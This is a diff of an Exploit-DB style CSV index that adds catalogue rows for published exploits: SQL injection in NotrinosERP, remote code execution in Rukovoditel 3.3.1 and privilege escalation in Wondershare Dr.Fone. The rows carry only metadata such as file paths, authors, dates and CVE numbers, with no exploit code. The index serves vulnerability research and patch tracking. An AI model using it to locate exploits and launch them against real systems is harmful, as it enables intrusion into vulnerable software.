 31902,exploits/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,webapps,php,,2008-06-10,2014-02-26,1,,,,,,https://www.securityfocus.com/bid/29655/info
+51318,exploits/php/webapps/51318.py,"NotrinosERP 0.7 - Authenticated Blind SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24788,,,,,
 11832,exploits/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,webapps,php,,2010-03-20,,1,OSVDB-63122;CVE-2010-1216,,,,,
 36696,exploits/php/webapps/36696.txt,"Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion",2012-02-11,indoushka,webapps,php,,2012-02-11,2015-04-10,1,CVE-2012-1200;OSVDB-79555,,,,,https://www.securityfocus.com/bid/51976/info
 36698,exploits/php/webapps/36698.txt,"Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion",2012-02-11,indoushka,webapps,php,,2012-02-11,2015-04-10,1,CVE-2012-1200;OSVDB-79556,,,,,https://www.securityfocus.com/bid/51976/info
@@ -28627,6 +28635,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,,
 48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,,
 51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
+51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,,
 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip,
 46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip,
@@ -41413,6 +41422,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,,2019-10-31,2019-10-31,0,,"Buffer Overflow",,,http://www.exploit-db.comallok_wmvconverter.exe,
 47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,,
 47617,exploits/windows/local/47617.txt,"Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,,
+51324,exploits/windows/local/51324.txt,"Wondershare Dr Fone 12.9.6 - Privilege Escalation",2023-04-07,"Thurein Soe",local,windows,,2023-04-07,2023-04-07,0,CVE-2023-27010,,,,,
 50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",2022-05-11,AkuCyberSec,local,windows,,2022-05-11,2022-05-11,0,,,,,,
 50755,exploits/windows/local/50755.txt,"Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path",2022-02-18,"Luis Martínez",local,windows,,2022-02-18,2022-02-18,0,,,,,,
 50813,exploits/windows/local/50813.txt,"Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path",2022-03-09,"Mohamed Alzhrani",local,windows,,2022-03-09,2022-03-09,0,,,,,,